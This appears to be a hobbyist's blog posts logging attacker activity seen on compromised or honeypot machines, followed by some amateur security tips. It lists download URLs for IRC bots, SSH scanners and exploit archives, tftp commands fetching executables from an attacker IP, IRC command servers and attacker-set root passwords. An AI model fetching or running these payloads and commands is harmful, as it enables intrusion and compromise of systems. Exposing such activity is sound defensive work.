Oh no more tool!

Hi,

Found some tools beeing used om my machine. So lets share!

http://www.brotacel.007sites.com/shell.txt (mechbot)

http://www.members.lycos.co.uk/adralex/slutBot.tgz(mechbot)

http://npchk.110mb.com/redone.log (psybnc)

http://spdu.us/2009.tgz (wunderbar emporium2 exploit)

http://gabanu.home.ro/redone.log (psybnc)

And you can chat with the guys that posted the mechbots at undernet channel #can, #Adralex and #made

Hello, who is there?

Omg guys! hacking a system and using the tftp command. Thats so oldskool!

tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE

tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE

But lets see what you guys are going to execute.

As far as I can see you guys have some nice irc's there

mindleak.com

0xff.memzero.info

0x80.online-software.org

0x80.goingformars.com

0x80.martiansong.com

0x80.my1x1.com

And look at that trying to steal all my passwords and sniff my keyboard and put them in a file called pstorec.dll. So if you lost your passwords you just scan your computer for pstorec.dll

Look at that a blast from the past. These guys are actually using some old code

mssqludp.c

mssql2000.c

mssql.c

veritas.c

lsass135.c

lsass445.c

rpc445.c

rpc135.c

dcom445.c

dcom135.c

Like I ever use a non updated windows XP or a 2K machine.

If you ever want to see a old bot irc you should check this one out!

/server 194.109.11.65 6556

channel: #9#, #raw #exploit

New toy's

Just found some new toys to play with. A ssh scanner and a Mechbot. This guy even made a nice script for it. Almost untraceable ... not ... You can find the unixbots on undernet, channel #can.

#ReMuSeR - Private Version

[+] Exemplu : ./start channel

http://kilix.clan.su/ssh.tgz (sshscaner)

http://remuser.host.sk/linux.jpg (unrar/zip/tar it)

Think your password is secure?

Nope, it doesnt matter if you have ukd718qmq or 12phpgopr even have 1hxtq65e as a password. There are always people out there, trying to infect your computer with a virus and sending your password to them.

A few tips to be secure.

1. Don't accept files from friends that contains a .pif, jpg, gif, bmp or .exe.

2. Make sure you dubble check it before opening files

3. Use a virusscanner or send it to http://www.virustotal.com

4. Change your password often. Especially for banking, paypal accounts etc.

5. Check the website at http://www.siteadvisor.com/

6. Firefox users use noscript addon. (I know it could be a pain in the ass. But scammers like to infect you through advertisement

7. Update your software often

8. Use linux mint/ubuntu

9. Do you have a nephew/uncle/neighbour who says to know lots of computers? They rarely are professionals and know very little of security....

10. Unplug the internet and life in a forrest. Be one with nature!

I wonder

If the feds know about crimeirc.net channel #ccpower.

crimeirc.net Estimated Worth $1408.9 USD

Dear admin,

By the time you find this it means

that u have found me on your box..

I just wanna tell u some things..

1. if i done any damage to your box,

i didn't do it on pourpuse

2.i didn't alter any files.. like ps/netstat..

3.if you need any help in securing your box/removing

my rootkit.. email me or somethin.. *******@yahoo.com

Best regards,

Your Rootkit ;)

Ripping it and call it private

first of all. My english sucks! I know!

But what i've seen so far is that people are just ripping other people tools and calling it private! Source look the same to me only the header is changed. Why?

Unixbots at undernet channel #colombo10

Found: traped in Honeypot

IP used: 172.158.130.36

Channel: #colombo10

Bot owner: colo1

Using: EnergyMech, IRC Bot software

Email: GigiBazat@Yahoo.com

Passwords used to change Root of SSHD

!@#$cristimata!@#$

pulamea123daumuie

halt

123456

Software downloads:

http://zomby2009.ilive.ro/0809.tgz (contains exploits)

http://colomboten.ucoz.ru/kriss.tgz (contains a scanner)

http://www.visatorul.go.ro/Quick.mp3 (contains a scanner)

http://colomboten.ucoz.ru/fast.tgz (contains a mechbot)

http://www.personale.110mb.com/scan/scanner.tgz

http://www.tiger1ne.netfast.org/linuxteam.tgz (contains a scanner)

Work directory

/var/tmp

Additional information:

You will find some old kernel exploits from august (0809.tgz)